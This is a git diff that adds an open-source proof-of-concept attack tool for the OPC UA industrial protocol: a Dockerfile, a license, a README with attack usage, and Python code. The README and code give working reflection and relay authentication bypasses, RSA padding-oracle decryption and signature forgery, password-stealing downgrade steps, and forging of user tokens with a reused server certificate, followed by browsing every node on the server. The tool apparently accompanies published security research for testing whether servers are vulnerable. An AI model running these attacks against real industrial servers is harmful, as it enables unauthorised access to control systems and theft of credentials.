diff --git a/Dockerfile b/Dockerfile new file mode 100644 index 0000000..fca9671 --- /dev/null +++ b/Dockerfile @@ -0,0 +1,6 @@ +FROM python:3.10 + +COPY . /app/ +WORKDIR /app +RUN pip install -r requirements.txt +ENTRYPOINT ["python", "opcattack.py"] diff --git a/LICENSE b/LICENSE new file mode 100644 index 0000000..f9299a0 --- /dev/null +++ b/LICENSE @@ -0,0 +1,21 @@ +MIT License + +Copyright (c) 2025 Secura + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. diff --git a/README.md b/README.md new file mode 100644 index 0000000..ca3983a --- /dev/null +++ b/README.md @@ -0,0 +1,187 @@ +# OPC UA attack tool + +Python tool to automate the OPC UA attacks described in my talk "[No VPN Needed? Cryptographic Attacks Against the OPC UA Protocol](https://www.blackhat.com/us-25/briefings/schedule/index.html#no-vpn-needed-cryptographic-attacks-against-the-opc-ua-protocol-44760)", and to +evaluate whether an OPC UA endpoint is potentially vulnerable. + +## Usage + + $ ./opcattack.py -h + usage: opcattack.py [-h] attack ... + + Proof of concept tool for attacks against the OPC UA security protocol. + + positional arguments: + attack attack to test + check evaluate whether attacks apply to server + reflect authentication bypass via reflection attack + relay authentication bypass via relay attack between two servers + cn-inject path injection via an (untrusted) certificate CN + auth-check tests if server allows unauthenticated access + decrypt sniffed password and/or traffic decryption via padding + oracle + sigforge signature forgery via padding oracle + client-downgrade + password stealing downgrade attack against a client + + options: + -h, --help show this help message and exit + +Run `opcattack.py -h` to get help for configuration options of a specific attack. + +## Installation + +Requires Python 3.10 or higher. Install dependencies via `pip install -r requirements.txt`. + +Alternatively, you can build a Docker container: + + docker build -t opcattack . + docker run -it opcattack + +When running the `reflect` attack with `--bypass-opn` and `-T` flags, you may want to persist the cache file like this: + + docker run -it -v opccache:/var/cache opcattack reflect -c /var/cache/opcfile --bypass-opn -T -C opc.tcp://: + + +## Evaluating an endpoint + +The first thing you'll want to do is enumerate the endpoints of an OPC UA server by running the following command +against either the server itself or a discovery server: + + opcattack.py check opc.tcp://: + +Or, if the server supports HTTPS: + + opcattack.py check https://: + +The output will list endpoint information as well as which attack may be applicable based on the supported security +policies and transport protocols. + +If you want to determine whether the server is vulnerable to the timing-based padding oracle variant, you can run +`check -t`, which measures response times for different ciphertext expansion parameters. + +## Checking if authentication is required + +An OPC UA endpoint may be configured to simply not enforce client or user authentication in the first place. While this +is not the most exciting vulnerability, it is important to check this first to make sure that either authentication +bypass actually, well, bypasses something. You can run `opcattack.py auth-check ` to try a simple anonymous +login. + +If successful, it will enumerate all readable nodes within the OPC server. It does not test for write access, however. + +## Performing an HTTPS reflect/relay attack (attack 1) + +If the `check` command reports at least one HTTPS endpoint, a reflection attack may be possible whenever a server +trusts its own certificate. A PoC can be executed as follows: + + opcattack.py reflect https://:/ + +This will carry out all the necessary steps. If succesful, the tool will enumerate all nodes on the server; this +demonstration can be disabled via the `-n` flag. + +If client authentication is succesfully bypassed but the server also requires user authentication this is reported by +the tool. If certificate based user authentication is allowed the tool will automatically attempt reusing the +reflected signature to spoof user authentication as well. + +HTTPS relay attacks between two different servers can be executed as follows: + + opcattack.py relay https:// https:// + + +## Performing an RSA padding oracle attack (attack 2) + +### Error-based variant + +If you just want a proof of concept on whether a padding oracle is possible, the most straightforward way to do this +is via the `sigforge` command, which attempts to use a padding oracle attack to forge an RSA signature over any chosen +message with the server's public key. You can then verify this signature using a tool like OpenSSL, to demonstrate that +the signature indeed matches the given message. Run it as follows: + + opcattack.py sigforge opc.tcp://: + +All padding oracle commands will first check for a few predefined status codes or messages, and tests their reliability +by submitting many correctly and incorrectly padded encrypted messages. The "quality score" of the padding oracle is +judged based on its false negative rate. If a single false positive is detected, the method is scored a 0. + +Not all OPC UA implementations have been tested with this. If an implementation's error messages need to be +distinguished in a way not yet accounted for this tool will not be smart enough to find it. + +The tool also allows a decryption attack. While this can be done for any RSA ciphertext produced with the same public +key it is most useful on a passively sniffed secure channel handshake or an encrypted password. See +`opcattack.py decrypt -h` for instructions on how to extract those. You can run this as follows: + + opcattack.py decrypt opc.tcp://: + +The tool will print the hex-encoded plaintext, if succesful. If the plaintext looks like an encrypted password this +password will be decoded. If the plaintext looks like an OpenSecureChannel message it will be parsed and printed, +revealing the secret nonce inside. + +When the two nonces of the same handshake are decrypted the channel keys can be derived and used to decrypt the rest +of the communication. That is currently not implemented in this tool, however. + +### Timing-based variant + +If no error-based oracle is found, you can test a timing-based oracle instead. First, run `opcattack.py check -t` to +test response timings. This will produce results such as the following: + + [*] Timing experiment results: + [+] Expansion parameter 10: + [+] Average time with correct padding: 0.018887882232666017 + [+] Average time with incorrect padding: 0.005357732772827148 + [+] Shortest time with correct padding: 0.016694307327270508 + [+] Longest time with incorrect padding: 0.022701740264892578 + [+] ----------------- + [+] Expansion parameter 30: + [+] Average time with correct padding: 0.03950897693634033 + [+] Average time with incorrect padding: 0.005196962356567383 + [+] Shortest time with correct padding: 0.035872697830200195 + [+] Longest time with incorrect padding: 0.011386394500732422 + [+] ----------------- + [+] Expansion parameter 50: + [+] Average time with correct padding: 0.06519682884216309 + [+] Average time with incorrect padding: 0.005134844779968261 + [+] Shortest time with correct padding: 0.05526590347290039 + [+] Longest time with incorrect padding: 0.009844779968261719 + [+] ----------------- + [+] Expansion parameter 100: + [+] Average time with correct padding: 0.1187672519683838 + [+] Average time with incorrect padding: 0.00522763729095459 + [+] Shortest time with correct padding: 0.10398173332214355 + [+] Longest time with incorrect padding: 0.013846635818481445 + [+] ----------------- + +When a timing-based padding oracle is present then the time with correct padding should be longer than the time with +incorrect padding. Here, that is obviously the case. For executing the attack, you need to pick an "expansion +parameter" that shows a clear difference between the "shortest time with correct padding" and the +"longest time with incorrect padding". A bigger expansion parameter will generally be more reliable but less +performant. + +Finally, you need to pick a threshold which is some value in between the "shortest time with correct padding" and +the "longest time with incorrect padding". This value will be used to judge how to classify a padding oracle query. +When the response is positive, the query will be repeated a few times to reduce the chance of false positives due to +temporary network hiccups. + +You can configure these expansion and threshold parameters by adding the flags +`-T -C ` to a `sigforge`, `decrypt` or `reflect` command. Once these +parameters are added, timing-based padding oracles will be taken into account with these parameters. + +### Combining with a reflection attack + +The tool also implements the combination of a reflection and two padding oracle attacks to achieve an authentication +bypass over an `opc.tcp` secure channel. You can run this by adding the `--bypass-opn` flag to the `reflect` command: + + opcattack.py reflect https://:/ --bypass-opn + +If the padding oracle is timing based you can also add `-T` and `-C` parameters. + +The tool will cache the result of the "first half" of the attack (i.e. the signature spoofing phase). If the attack +fails or halts somewhere during the "second half" (the decryption or reflection phases), you can try running the tool +again and the first half will be automatically skipped. + +### Miscellaneous attacks + +The tool implements two other experimental attacks, but these are not novel protocol flaws: + +- `cn-inject`: attempts a path injection attack via the CN of an untrusted certificate. While in theory this would be possible against a naive implementation of the OPC UA [certificate file name conventions](https://reference.opcfoundation.org/GDS/v105/docs/F) I have not actually found an implementation (yet) that is vulnerable to this. +- `client-downgrade`: MitM attack to downgrade encryption of a client connection, attempting to steal the user password. This is already pretty much a known potential flaw, however, and most implementations I found are not affected because they need the user to specify a specific security policy in the client configuration. + + diff --git a/attacks.py b/attacks.py index 64aa3c0..d14df5a 100644 --- a/attacks.py +++ b/attacks.py @@ -1,37 +1,99 @@ +import requests +requests.packages.urllib3.disable_warnings() + +from Crypto.PublicKey.RSA import RsaKey + from messages import * from message_fields import * from typing import * from crypto import * -from datetime import datetime -from socket import socket, create_connection +from socket import socket, create_connection, create_server, SHUT_RDWR +from random import Random, randint +from enum import Enum, auto +from binascii import hexlify, unhexlify +from base64 import b64encode, b64decode +from datetime import datetime, timedelta +from pathlib import Path +from decimal import Decimal +from io import BytesIO -import sys, os, itertools +import sys, os, itertools, re, math, hashlib, json, time, dataclasses +import keepalive # Logging and errors. -def log(msg : string): +def log(msg : str): print(f'[*] {msg}', file=sys.stderr) -def log_success(msg : string): +def log_success(msg : str): print(f'[+] {msg}') + +# Integer division that rounds the result up. +def ceildiv(a,b): + return a // b + (a % b and 1) + +# Self signed certificate template (DER encoded) used for path injection attack. +SELFSIGNED_CERT_TEMPLATE = b64decode('MIIERDCCAyygAwIBAgIUcC5NBws70ghGv3jjkdIBjlcDRgMwDQYJKoZIhvcNAQELBQAwXTEUMBIGCgmSJomT8ixkARkWBHRlc3QxFzAVBgNVBAoMDk9QQyBGb3VuZGF0aW9uMRAwDgYDVQQIDAdBcml6b25hMQswCQYDVQQGEwJVUzENMAsGA1UEAwwEdGVzdDAeFw0yNDAzMTkxNDAwMTZaFw0yNTAzMTkxNDAwMTZaMF0xFDASBgoJkiaJk/IsZAEZFgR0ZXN0MRcwFQYDVQQKDA5PUEMgRm91bmRhdGlvbjEQMA4GA1UECAwHQXJpem9uYTELMAkGA1UEBhMCVVMxDTALBgNVBAMMBHRlc3QwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDGw8ewnzA+09uDx3zJd96FHLmzX2JhmTHdelPQgFz1UQxT1JLdjZv8uIpV5chcl/fvRga9kWzNS3YtADyG0LfmGfA6M5j/sfUatfOBEe1UJEO3TFpvRaeQd9KIIWk9XR5ue0bihR5Wk59f5jvo/RY4J/t3rWUny7R3HXrWxSlY0iskr3+sRkRIcYqqHehsCtJ2k1ZNUcN1HHV+FicRuf695Os1aoXBi/ViX1A4/3UmOrsHCXThj/4zEfbG5puJHBf5SMbjBjoZu7uCrYA53r/Wt3zLAnxKdbJjZ9nJP0x2pyzwd19JtqGqvKICdG/NKArjVxjjY2jqzGN/ExWB2mUbAgMBAAGjgfswgfgwDAYDVR0TAQH/BAIwADAOBgNVHQ8BAf8EBAMCAvQwIAYDVR0lAQH/BBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMA8GA1UdEQQIMAaGBHRlc3QwgYUGA1UdIwR+MHyAFIHIizG1yMWN1z6tsU9VYpeAyqoloWGkXzBdMRQwEgYKCZImiZPyLGQBGRYEdGVzdDEXMBUGA1UECgwOT1BDIEZvdW5kYXRpb24xEDAOBgNVBAgMB0FyaXpvbmExCzAJBgNVBAYTAlVTMQ0wCwYDVQQDDAR0ZXN0ggF7MB0GA1UdDgQWBBSByIsxtcjFjdc+rbFPVWKXgMqqJTANBgkqhkiG9w0BAQsFAAOCAQEAb9vxdW04fyXxjdNEHY5R4vDTNzyK2BIwb264tgrAtmAohXL4QqyXFxF6NcnpRv9n2iGhWLUpvE/LbGmU0s7Y8QmHHcngpwRkmasUlEUut3h9cZ9xshPrkVvNTY+SpSCzrNTL3dKv5AN04we6GZAPAhSfNeFKy80qQRxQYvuqL+/FqVCqjtLhQLxH8KQDtklCcDJh0YGgxesO7Zc1QhgFXg/YzcNEb3htgETpe281LCAxWJbhKqY+DuIeR/68halfxfryf10TRGcYYJG6H31jA69EJnaX3FwP592Gr5PY53VCuxQySOTUUKLkE4EdjRwA5SL8HabrCAebscOdwAeVLA==') +TEMPLATE_APP_URI = 'test' + +# Fixed clientNonce value used within spoofed OpenSecureChannel requests. +SPOOFED_OPN_NONCE = unhexlify('1337133713371337133713371337133713371337133713371337133713371337') # Thrown when an attack was not possible due to a configuration that is not vulnerable to it (other exceptions indicate # unexpected errors, which can have all kinds of causes). class AttackNotPossible(Exception): pass + +# Protocols supported for current attacks. +class TransportProtocol(Enum): + TCP_BINARY = auto() + HTTPS = auto() + +def proto_scheme(protocol : TransportProtocol) -> str: + return { + TransportProtocol.TCP_BINARY: "opc.tcp", + TransportProtocol.HTTPS : "https", + }[protocol] + +def parse_endpoint_url(url): + m = re.match(r'(?P[\w.]+)://(?P[^:/]+):(?P\d+)', url) + if not m: + raise Exception(f'Don\'t know how to process endpoint url: {url}') + else: + protos = { + "opc.tcp": TransportProtocol.TCP_BINARY, + "https" : TransportProtocol.HTTPS, + "opc.https" : TransportProtocol.HTTPS, + } + if m.group('scheme') not in protos: + raise Exception(f'Unsupported protocol: "{m.group("scheme")}" in URL {url}.') + return (protos[m.group('scheme')], *m.group('host', 'port')) # Common routines. # Send an OPC request message and receive a response. -def opc_exchange(sock : socket, request : OpcMessage, response_obj : Optional[OpcMessage]) -> OpcMessage: +def opc_exchange(sock : socket, request : OpcMessage, response_obj : Optional[OpcMessage] = None) -> OpcMessage: with sock.makefile('rwb') as sockio: sockio.write(request.to_bytes()) sockio.flush() response = response_obj or request.__class__() response.from_bytes(sockio) return response - -# Sets up the connection, does a plain hello and simply ignores the server's size and chunking wishes. -def connect_and_hello(host : str, port : int) -> socket: + +# Variant that supports response chunking. Yields each chunk as a separate response object. +def chunkable_opc_exchange(sock : socket, request : OpcMessage, response_obj : Optional[OpcMessage] = None) -> Iterator[OpcMessage]: + with sock.makefile('rwb') as sockio: + sockio.write(request.to_bytes()) + sockio.flush() + done = False + while not done: + response = response_obj or request.__class__() + done = response.from_bytes(sockio, allow_chunking=True) + yield response + +# Sets up a binary TCP connection, does a plain hello and simply ignores the server's size and chunking wishes. +def connect_and_hello(url : str) -> socket: + proto, host, port = parse_endpoint_url(url) + assert proto == TransportProtocol.TCP_BINARY sock = create_connection((host,port)) opc_exchange(sock, HelloMessage( version=0, @@ -39,7 +101,7 @@ def connect_and_hello(host : str, port : int) -> socket: sendBufferSize=2**16, maxMessageSize=2**24, maxChunkCount=2**8, - endpointUrl=f'opc.tcp://{host}:{port}', + endpointUrl=url, ), AckMessage()) return sock @@ -51,7 +113,7 @@ def simple_requestheader(authToken : NodeId = NodeId(0,0)) -> requestHeader.Type returnDiagnostics=0, auditEntryId=None, timeoutHint=0, - additionalHeader=b'', + additionalHeader=None, ) @dataclass @@ -60,6 +122,7 @@ class ChannelState: channel_id: int token_id : int msg_counter : int + securityMode : MessageSecurityMode crypto: Optional[SessionCrypto] # Attempt to start a "Secure" channel with no signing or encryption. @@ -69,27 +132,87 @@ def unencrypted_opn(sock: socket) -> ChannelState: securityPolicyUri=SecurityPolicy.NONE, senderCertificate=None, receiverCertificateThumbprint=None, - sequenceNumber=1, - requestId=1, - encryptedMessage=openSecureChannelRequest.create( - requestHeader=simple_requestheader(), - clientProtocolVersion=0, - requestType=SecurityTokenRequestType.ISSUE, - securityMode=MessageSecurityMode.NONE, - clientNonce=None, - requestedLifetime=3600000, - ).to_bytes() + encodedPart=encodedConversation.to_bytes(encodedConversation.create( + sequenceNumber=1, + requestId=1, + requestOrResponse=openSecureChannelRequest.to_bytes(openSecureChannelRequest.create( + requestHeader=simple_requestheader(), + clientProtocolVersion=0, + requestType=SecurityTokenRequestType.ISSUE, + securityMode=MessageSecurityMode.NONE, + clientNonce=None, + requestedLifetime=3600000, + )) + )) )) - resp = openSecureChannelResponse.from_bytes(reply.encryptedMessage) + convrep, _ = encodedConversation.from_bytes(reply.encodedPart) + resp, _ = openSecureChannelResponse.from_bytes(convrep.requestOrResponse) return ChannelState( sock=sock, channel_id=resp.securityToken.channelId, token_id=resp.securityToken.tokenId, - msg_counter=1, + msg_counter=2, + securityMode=MessageSecurityMode.NONE, crypto=None, ) + +# Do an OPN protocol handshake with a certificate and private key. +def authenticated_opn(sock : socket, endpoint : endpointDescription.Type, client_certificate : bytes, privkey : RsaKey) -> ChannelState: + sp = endpoint.securityPolicyUri + pk = certificate_publickey(endpoint.serverCertificate) + + if sp == SecurityPolicy.NONE: + return unencrypted_opn(sock) + else: + client_nonce = os.urandom(32) + plaintext = encodedConversation.to_bytes(encodedConversation.create( + sequenceNumber=1, + requestId=1, + requestOrResponse=openSecureChannelRequest.to_bytes(openSecureChannelRequest.create( + requestHeader=simple_requestheader(), + clientProtocolVersion=0, + requestType=SecurityTokenRequestType.ISSUE, + securityMode=endpoint.securityMode, + clientNonce=client_nonce, + requestedLifetime=3600000, + )) + )) + msg = OpenSecureChannelMessage( + secureChannelId=0, + securityPolicyUri=sp, + senderCertificate=client_certificate, + receiverCertificateThumbprint=certificate_thumbprint(endpoint.serverCertificate), + encodedPart=plaintext + ) + + # Apply signing and encryption. + msg.sign_and_encrypt( + signer=lambda data: rsa_sign(sp, privkey, data), + encrypter=lambda ptext: rsa_ecb_encrypt(sp, pk, ptext), + plainblocksize=rsa_plainblocksize(sp, pk), + cipherblocksize=pk.size_in_bytes(), + sigsize=pk.size_in_bytes(), + ) + replymsg = opc_exchange(sock, msg) + + # Immediately start parsing plaintext, ignoring padding and signature. + convrep, _ = encodedConversation.from_bytes(rsa_ecb_decrypt(sp, privkey, replymsg.encodedPart)) + resp, _ = openSecureChannelResponse.from_bytes(convrep.requestOrResponse) + + return ChannelState( + sock=sock, + channel_id=resp.securityToken.channelId, + token_id=resp.securityToken.tokenId, + msg_counter=2, + securityMode=endpoint.securityMode, + crypto=deriveKeyMaterial(sp, client_nonce, resp.serverNonce) + ) +# In case a response object has a header. Check it for error codes. +def check_status(response : NamedTuple): + if hasattr(response, 'responseHeader') and response.responseHeader.serviceResult & 0x80000000: + raise ServerError(response.responseHeader.serviceResult, f'Bad status code.') # Exchange a conversation message, once the channel has been established by the OPN exchange. def session_exchange(channel : ChannelState, @@ -98,87 +221,130 @@ def session_exchange(channel : ChannelState, msg = ConversationMessage( secureChannelId=channel.channel_id, tokenId=channel.token_id, - encodedPart=encodedConversation.create( + encodedPart=encodedConversation.to_bytes(encodedConversation.create( sequenceNumber=channel.msg_counter, requestId=channel.msg_counter, - encodedMessage=reqfield.create(**req_data).to_bytes(), - ) + requestOrResponse=reqfield.to_bytes(reqfield.create(**req_data)), + )) ) - if crypto: - # Add padding and signing into encoded message. - msgbytes = msg.to_bytes() - padding = pkcs7_pad(msgbytes)[len(msgbytes):] - mac = sha_hmac(crypto.policy, crypto.clientKeys.signingKey, msgbytes + padding) - plaintext = msg.encodedPart + padding + mac - - # Encrypt encoded part. - msg.encodedPart = aes_cbc_encrypt(crypto.clientKeys.encryptionKey, crypto.clientKeys.iv, plaintext) + crypto = channel.crypto + assert crypto or channel.securityMode == MessageSecurityMode.NONE + if channel.securityMode == MessageSecurityMode.SIGN_AND_ENCRYPT: + msg.sign_and_encrypt( + signer=lambda data: sha_hmac(crypto.policy, crypto.clientKeys.signingKey, data), + encrypter=lambda ptext: aes_cbc_encrypt(crypto.clientKeys.encryptionKey, crypto.clientKeys.iv, ptext), + plainblocksize=16, + cipherblocksize=16, + sigsize=macsize(crypto.policy), + ) + elif channel.securityMode == MessageSecurityMode.SIGN: + msg.sign(lambda data: sha_hmac(crypto.policy, crypto.clientKeys.signingKey, data), macsize(crypto.policy)) # Do the exchange. - reply = opc_exchange(channel.sock, msg) + chunks = [reply.encodedPart for reply in chunkable_opc_exchange(channel.sock, msg)] - if crypto: - # Decrypt. - plaintext = aes_cbc_encrypt(crypto.serverKeys.encryptionKey, crypto.serverKeys.iv, reply.encodedPart) - - # Remove signature and padding. Don't bother to validate. - decodedPart = pkcs7_unpad(plaintext[:macsize(crypto.policy)]) - else: - decodedPart = reply.encodedPart + # Decrypt/unsign if needed. + respbytes = b'' + for chunk in chunks: + if channel.securityMode == MessageSecurityMode.SIGN_AND_ENCRYPT: + # Decrypt and unpad, while simply ignoring MAC. + decrypted = aes_cbc_decrypt(crypto.serverKeys.encryptionKey, crypto.serverKeys.iv, chunk) + unsigned = decrypted[:-macsize(crypto.policy)] + decoded = pkcs7_unpad(unsigned, 16)[:-1] if not unsigned.endswith(b'\x00') else unsigned[:-1] + elif channel.securityMode == MessageSecurityMode.SIGN: + # Just strip MAC. + decoded = chunk[:-macsize(crypto.policy)] + else: + assert(channel.securityMode == MessageSecurityMode.NONE) + decoded = chunk + convo, _ = encodedConversation.from_bytes(decoded) + respbytes += convo.requestOrResponse + # Increment the message counter. channel.msg_counter += 1 # Parse the response. - return respfield.from_bytes(encodedConversation.from_bytes(decodedPart).encodedMessage) + resp, _ = respfield.from_bytes(respbytes) + check_status(resp) + return resp + +# OPC exchange over HTTPS. +# https://reference.opcfoundation.org/Core/Part6/v105/docs/7.4 +def https_exchange( + url : str, nonce_policy : Optional[SecurityPolicy], + reqfield : EncodableObjectField, respfield : EncodableObjectField, + **req_data + ) -> NamedTuple: + headers = { + 'Content-Type': 'application/octet-stream', + } + if nonce_policy is not None: + headers['OPCUA-SecurityPolicy'] = f'http://opcfoundation.org/UA/SecurityPolicy#{nonce_policy.value}' + if url.startswith('opc.http'): + url = url[4:] + reqbody = reqfield.to_bytes(reqfield.create(**req_data)) + http_resp = requests.post(url, verify=False, headers=headers, data=reqbody) + resp = respfield.from_bytes(http_resp.content)[0] + check_status(resp) + return resp -# Relevant endpoint information. -@dataclass -class EndpointInfo: - host : str - port : int - certificate : bytes - policy : SecurityPolicy - mode : MessageSecurityMode - accepts_certauth : bool +# Picks either session_exchange or https_exchanged based on channel type. +def generic_exchange( + chan_or_url : ChannelState | str, nonce_policy : Optional[SecurityPolicy], + reqfield : EncodableObjectField, respfield : EncodableObjectField, + **req_data + ) -> NamedTuple: + if type(chan_or_url) == ChannelState: + return session_exchange(chan_or_url, reqfield, respfield, **req_data) + else: + assert type(chan_or_url) == str and parse_endpoint_url(chan_or_url)[0] == TransportProtocol.HTTPS + return https_exchange(chan_or_url, nonce_policy, reqfield, respfield, **req_data) # Request endpoint information from a server. -def get_endpoints(host : str, port: int) -> List[EndpointInfo]: - with connect_and_hello(host, port) as sock: - chan = unencrypted_opn(sock) - resp = session_exchange(sock, chan, getEndpointsRequest, getEndpointsResponse, - requestHeader=simple_requestheader(), - endpointUrl=f'opc.tcp://{host}:{port}', - localeIds=[], - profileUris=[], - ) - - def parse_epurl(url): - m = re.match(r'opc\.tcp://(?P[^:/]+):(?P\d+)/', url) - if not m: - raise Exception(f'Don\'t know how to process endpoint url: {url}') +def get_endpoints(ep_url : str) -> List[endpointDescription.Type]: + try: + if ep_url.startswith('opc.tcp://'): + with connect_and_hello(ep_url) as sock: + chan = unencrypted_opn(sock) + resp = session_exchange(chan, getEndpointsRequest, getEndpointsResponse, + requestHeader=simple_requestheader(), + endpointUrl=ep_url, + localeIds=[], + profileUris=[], + ) else: - return m.group('host', 'port') - - # Only return endpoints that use the binary protocol. - return [EndpointInfo( - *parse_epurl(ep.endpointUrl), ep.serverCertificate, - ep.securityPolicyUri, ep.messageSecurityMode, - any(t.tokenType == CERTIFICATE for t in ep.userIdentityTokens) - ) for ep in resp.endpoints if ep.transportProfileUri.endswith('uabinary')] + assert(parse_endpoint_url(ep_url)[0] == TransportProtocol.HTTPS) + resp = https_exchange(ep_url, None, getEndpointsRequest, getEndpointsResponse, + requestHeader=simple_requestheader(), + endpointUrl=ep_url, + localeIds=[], + profileUris=[], + ) + + return resp.endpoints + except Exception as ex: + if ep_url.endswith('/discovery'): + raise ex + else: + # Try again while adding /discovery to URL. + return get_endpoints(f'{ep_url.rstrip("/")}/discovery') +# Performs the relay attack. Channels can be either OPC sessions or HTTPS URLs. def execute_relay_attack( - imp_chan : ChannelState, imp_endpoint : endpointDescription.Type, - login_chan : ChannelState, login_endpoint : endpointDescription.Type + imp_chan : ChannelState | str, imp_endpoint : endpointDescription.Type, + login_chan : ChannelState | str, login_endpoint : endpointDescription.Type, + prefer_certauth : bool = False ) -> NodeId: def csr(chan, client_ep, server_ep, nonce): - return session_exchange(chan, createSessionRequest, createSessionResponse, + return generic_exchange(chan, server_ep.securityPolicyUri, createSessionRequest, createSessionResponse, requestHeader=simple_requestheader(), - clientDescription=client_ep.server, + clientDescription=client_ep.server._replace(applicationUri=applicationuri_from_cert(client_ep.serverCertificate)), # Prosys needs this. serverUri=server_ep.server.applicationUri, + endpointUrl=server_ep.endpointUrl, sessionName=None, clientNonce=nonce, clientCertificate=client_ep.serverCertificate, @@ -187,17 +353,24 @@ def csr(chan, client_ep, server_ep, nonce): ) # Send CSR to login_endpoint, pretending we're imp_endpoint. Use arbitrary nonce. + log(f'Creating first session on login endpoint ({login_endpoint.endpointUrl})') createresp1 = csr(login_chan, imp_endpoint, login_endpoint, os.urandom(32)) # Now send the server nonce of this channel as a client nonce on the other channel. + log(f'Got server nonce: {hexlify(createresp1.serverNonce)}') + log(f'Forwarding nonce to second session on impersonate endpoint ({imp_endpoint.endpointUrl})') createresp2 = csr(imp_chan, login_endpoint, imp_endpoint, createresp1.serverNonce) + log(f'Got signature over nonce: {hexlify(createresp2.serverSignature.signature)}') + + if createresp2.serverSignature.signature is None: + raise AttackNotPossible('Server did not sign nonce. Perhaps certificate was rejected, or an OPN attack may be needed first.') # Make a token with an anonymous or certificate-based user identity policy. anon_policies = [p for p in login_endpoint.userIdentityTokens if p.tokenType == UserTokenType.ANONYMOUS] cert_policies = [p for p in login_endpoint.userIdentityTokens if p.tokenType == UserTokenType.CERTIFICATE] - if anon_policies: + if anon_policies and not (prefer_certauth and cert_policies): usertoken = anonymousIdentityToken.create(policyId=anon_policies[0].policyId) - usersig = None + usersig = signatureData.create(algorithm=None,signature=None) elif cert_policies: log('User certificate required. Reusing the server certificate to forge user token.') usertoken = x509IdentityToken.create( @@ -211,7 +384,8 @@ def csr(chan, client_ep, server_ep, nonce): raise AttackNotPossible('Endpoint does not allow either anonymous or certificate-based authentication.') # Now activate the first session using the signature from the second session. - session_exchange(login_chan, activateSessionRequest, activateSessionResponse, + log(f'Using signature log in to {login_endpoint.endpointUrl}.') + generic_exchange(login_chan, login_endpoint.securityPolicyUri, activateSessionRequest, activateSessionResponse, requestHeader=simple_requestheader(createresp1.authenticationToken), clientSignature=createresp2.serverSignature, clientSoftwareCertificates=[], @@ -225,13 +399,13 @@ def csr(chan, client_ep, server_ep, nonce): # Demonstrate access by recursively browsing nodes. Variables are read. # Based on https://reference.opcfoundation.org/Core/Part4/v104/docs/5.8.2 -def demonstrate_access(chan : ChannelState, authToken : NodeId): +def demonstrate_access(chan : ChannelState | str, authToken : NodeId, policy : SecurityPolicy = None): max_children = 100 recursive_nodeclasses = {NodeClass.OBJECT} read_nodeclasses = {NodeClass.VARIABLE} def browse_from(root, depth): - bresp = session_exchange(chan, browseRequest, browseResponse, + bresp = generic_exchange(chan, policy, browseRequest, browseResponse, requestHeader=simple_requestheader(authToken), view=viewDescription.default_value, requestedMaxReferencesPerNode=max_children, @@ -251,11 +425,11 @@ def browse_from(root, depth): if ref.nodeClass in recursive_nodeclasses: # Keep browsing recursively. log_success(tree_prefix + f'+ {ref.displayName.text} ({ref.nodeClass.name})') - browse_from(ref.nodeId.nodeId) + browse_from(ref.nodeId.nodeId, depth + 1) elif ref.nodeClass in read_nodeclasses: # Read current variable value. For the sake of simplicity do one at a time. try: - readresp = session_exchange(chan, readRequest, readResponse, + readresp = generic_exchange(chan, policy, readRequest, readResponse, requestHeader=simple_requestheader(authToken), maxAge=0, timestampsToReturn=TimestampsToReturn.BOTH, @@ -263,12 +437,23 @@ def browse_from(root, depth): nodeId=ref.nodeId.nodeId, attributeId=0x0d, # Request value indexRange=None, - dataEncoding=QualifiedNameField.default_value, + dataEncoding=QualifiedNameField().default_value, )], ) - log_success(tree_prefix + f'- {ref.displayName.text}: "{readresp.value}"') + + for r in readresp.results: + if type(r.value) == list: + log_success(tree_prefix + f'+ {ref.displayName.text} (Array):') + for subval in r.value: + log_success(' ' + tree_prefix + f'+ {ref.displayName.text}: "{subval}"') + else: + log_success(tree_prefix + f'- {ref.displayName.text}: "{r.value}"') except UnsupportedFieldException as ex: log_success(tree_prefix + f'- {ref.displayName.text}: <{ex.fieldname}>') + except DecodeError as ex: + log_success(tree_prefix + f'- {ref.displayName.text}: ("{ex}")') + except Exception as ex: + log_success(tree_prefix + f'- {ref.displayName.text}: <<{ex}>> ("{ex}")') else: log_success(tree_prefix + f'- {ref.displayName.text} ({ref.nodeClass.name})') @@ -279,46 +464,1589 @@ def browse_from(root, depth): log('Tree: ') log_success('+ ') browse_from(NodeId(0, 84), 1) - log('Finished browsing.') - + log('Finished browsing.') # Reflection attack: log in to a server with its own identity. -def reflect_attack(address : Tuple[str, int]): - host, port = address - log(f'Attempting reflection attack against opc.tcp://{host}:port/') - endpoints = get_endpoints(host, port) +def reflect_attack(url : str, demo : bool, try_opn_oracle : bool, try_password_oracle : bool, cache_file : Path, timing_threshold : float, timing_expansion : int): + proto, host, port = parse_endpoint_url(url) + log(f'Attempting reflection attack against {url}') + endpoints = get_endpoints(url) + log(f'Server advertises {len(endpoints)} endpoints.') + + # Try to attack against the first endpoint with an HTTPS transport and a non-None security policy. + https_eps = [ep for ep in endpoints if ep.securityPolicyUri != SecurityPolicy.NONE and ep.transportProfileUri.endswith('https-uabinary')] + if https_eps: + target = https_eps[0] + tproto, thost, tport = parse_endpoint_url(target.endpointUrl) + assert tproto == TransportProtocol.HTTPS + url = target.endpointUrl + log(f'Targeting {url} with {target.securityPolicyUri.name} security policy.') + token = execute_relay_attack(url, target, url, target) + log_success(f'Attack succesfull! Authenticated session set up with {url}.') + if demo: + demonstrate_access(url, token, target.securityPolicyUri) + elif try_opn_oracle or try_password_oracle: + tcp_eps = [ep for ep in endpoints if ep.securityPolicyUri != SecurityPolicy.NONE and 